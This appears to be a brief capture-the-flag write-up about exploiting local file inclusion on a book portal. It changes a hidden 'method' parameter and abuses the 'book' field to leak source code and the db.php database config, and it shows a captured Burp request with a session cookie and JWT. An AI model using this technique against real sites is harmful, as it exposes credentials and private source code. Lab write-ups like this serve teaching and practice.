Skip to main content

Exploiting LFI

Upon intercepting the requests with Burp Suite, we see that the website has an interesting request field named method.

Changing the method field from 0 to 1 throws an error message about a missing book field.

error message - missing book field

Exploit Code

Using Burp Suite, we can control the book field, together with the ffuf results, to perform LFI and leak the source code of the book portal as well as the admin portal.

Here, we can read the content of the database config - db.php.

POST /includes/bookController.php HTTP/1.1
Content-Length: 42
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=test1e9549a0bf4b172e168a9ca5cbaa6fdb; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoidGVzdCJ9fQ.wO1HzPNOz55oU02jJT2wXL7Mvi0JNSB353p6Mgk3o7Y
Connection: close


We can thus proceed to read the various source code to see if anything important are revealed.